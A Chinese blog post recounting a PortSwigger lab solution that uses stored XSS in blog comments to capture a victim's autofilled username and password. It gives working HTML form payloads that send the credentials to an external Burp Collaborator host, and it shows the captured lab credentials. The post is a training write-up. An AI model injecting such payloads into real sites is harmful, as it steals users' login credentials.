某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

      • 跨站脚本(XSS)

        • 学徒-反射型XSS-未编码的HTML上下文
        • 学徒-存储型XSS-未编码的HTML上下文
        • 学徒-DOM型XSS-document.write接收器-location.search源
        • 从业者-DOM型XSS-document.write接收器-location.search源-位于select元素内
        • 学徒-DOM型XSS-innerHTML接收器-location.search源
        • 学徒-DOM型XSS-jQuery锚点href属性接收器-location.search源
        • 学徒-DOM型XSS-jQuery选择接收器-hashchange事件
        • 从业者-DOM型XSS-AngularJS表达式-尖括号与双引号HTML编码
        • 从业者-反射型DOM XSS
        • 从业者-存储型DOM XSS
        • 从业者-XSS上下文-HTML标签之间-反射型XSS-大多数标签和属性被阻止
        • 从业者-XSS上下文-HTML标签之间-反射型XSS-除了自定义标签外的所有标签都被阻止
        • 专家-XSS上下文-HTML标签之间-反射型XSS-事件处理程序和href属性被阻止
        • 从业者-XSS上下文-HTML标签之间-反射型XSS-允许使用SVG标签
        • 学徒-XSS上下文-HTML属性中-反射型XSS-尖括号HTML编码
        • 从业者-XSS上下文-HTML属性中-存储型XSS-锚点href属性与双引号HTML编码
        • 从业者-XSS上下文-HTML属性中-反射型XSS-link规范标签
        • 从业者-XSS上下文-JavaScript字符串中-反射型XSS-单引号和反斜杠转义
        • 学徒-XSS上下文-JavaScript字符串中-反射型XSS-尖括号HTML编码
        • 从业者-XSS上下文-JavaScript字符串中-反射型XSS-尖括号双引号HTML编码和单引号转义
        • 专家-XSS上下文-JavaScript URL中-反射型XSS-某些字符被阻止
        • 从业者-XSS上下文-利用HTML编码-onclick属性中的存储型XSS-尖括号双引号HTML编码-以及单引号反斜杠转义
        • 从业者-XSS上下文-模板字面量-反射型XSS-尖括号单引号双引号反斜杠和反引号Unicode转义
        • 从业者-利用跨站脚本-窃取cookie
        • 从业者-利用跨站脚本-捕获密码
          • 题目
          • 实操
        • 从业者-利用跨站脚本-执行CSRF
        • 专家-内容安全策略-反射型XSS-非常严格的CSP保护-悬挂标记攻击
        • 专家-内容安全策略-反射型XSS-绕过CSP保护
        • 专家-客户端模板注入-反射型XSS-无字符串的AngularJS沙箱逃逸
        • 专家-客户端模板注入-反射型XSS-AngularJS沙箱逃逸与CSP的碰撞
      • 跨站请求伪造(CSRF)

      • 跨域资源共享(CORS)

      • 点击劫持

      • 基于DOM的漏洞

      • WebSockets

    • 高级主题

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 客户端
  • 跨站脚本(XSS)
carsaid
2023-09-12
目录
题目
实操

从业者-利用跨站脚本-捕获密码

# 实验室:利用跨站脚本捕获密码

# 题目

此实验室在 博客评论功能 中包含一个存储型 XSS 漏洞。在发布评论后,实验室会模拟一个受害用户浏览这些评论。若要解决实验室问题,请利用此漏洞泄露受害者的用户名和密码,然后使用这些凭据 登录到受害者的帐户。

笔记

为了防止学院平台被用来攻击第三方,我们的防火墙阻止了实验室与任何外部系统之间的交互。要解决实验室问题,必须使用Burp Collaborator的默认公共服务器。

一些用户会注意到,本实验有一个替代解决方案,它不需要 Burp Collaborator。然而,这远没有偷凭证那么不易察觉。

实验室-从业者

利用跨站脚本捕获密码 >>

- name: 实验室-从业者
  desc: 利用跨站脚本捕获密码 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

点击任意 “View post” 进入文章详情页。

Not Found Image

提交一个评论,并尝试注入攻击载荷。

Not Found Image

评论内容中的载荷被正常解析。

Not Found Image

接下来就是构造一个带有form表单的攻击载荷,当受害者遇到该载荷时,将会自动填充用户名和密码,并自动提交至 BurpSuite 子域中。

我们可以拿实验室的登录界面来参考参考:

<form class="login-form" method="POST" action="/login">
    <input required="" type="hidden" name="csrf" value="cu4c5qf1NdE6hFgIxteHd1DkeUFmdaFf">
    <label>Username</label>
    <input required="" type="username" name="username" autofocus="">
    <label>Password</label>
    <input required="" type="password" name="password">
    <button class="button" type="submit"> Log in </button>
</form>
1
2
3
4
5
6
7
8

访问登录界面,启用开发者工具,选择登录框处的 form 表单,右键复制整个 form 表单的代码。

Not Found Image

但以上 form 表单代码并不能满足我们的需求,我们需要对其进行一些修改:

<script>
    function payload() {
        var form = document.getElementById("payload");
        form.submit();
    }
</script>

<form id="payload" action="https://hsdmncvdfl7rjh7f7v0cg4bltcz4nubj.oastify.com/">
    <input type="username" name="username">
    <input type="password" name="password" onchange=payload()>
</form>
1
2
3
4
5
6
7
8
9
10
11

在上述攻击载荷中,定义了一个form表单,其中包含两个输入框,分别用于捕获 自动填充的用户名与密码,同时为密码输入框添加了一个onchange事件。

当后一个输入框发生更改时,说明用户名密码已经被填充,onchange事件将会被触发,此时则会调用payload函数并自动提交 form 表单。

Not Found Image

在评论区注入载荷之后,回到文章页面看看效果。

遇到一个问题,form 表单提交至 BurpSuite 子域时会提示不安全,需要用户点击 “继续” 才能提交。

Not Found Image

这个问题很好解决,将目标 URL 的 HTTP 协议修改为 HTTPS 即可。

http:// 改为 https://

Not Found Image

提交修改过后的载荷,等待一段时间后,即可在 BurpSuite 中看到捕获的用户名和密码:

administrator:oon5uzjigy86s4mwpz5f

Not Found Image

访问登录界面,输入捕获的用户名和密码,并点击登录按钮。

Not Found Image

登录成功,实验完成。

Not Found Image

经过测试,以上攻击载荷可以省略script标签:

<form id="payload" action="https://hsdmncvdfl7rjh7f7v0cg4bltcz4nubj.oastify.com/">
    <input type="username" name="username">
    <input type="password" name="password" onchange="form=document.getElementById('payload');form.submit();">
</form>
1
2
3
4

什么?你问我题目中提到的 “替代解决方案” 是什么?

这个 “替代解决方案” 其实是XSS+CSRF组合攻击,可以自行尝试。

编辑 (opens new window)
从业者-利用跨站脚本-窃取cookie
从业者-利用跨站脚本-执行CSRF

← 从业者-利用跨站脚本-窃取cookie 从业者-利用跨站脚本-执行CSRF→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2025 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式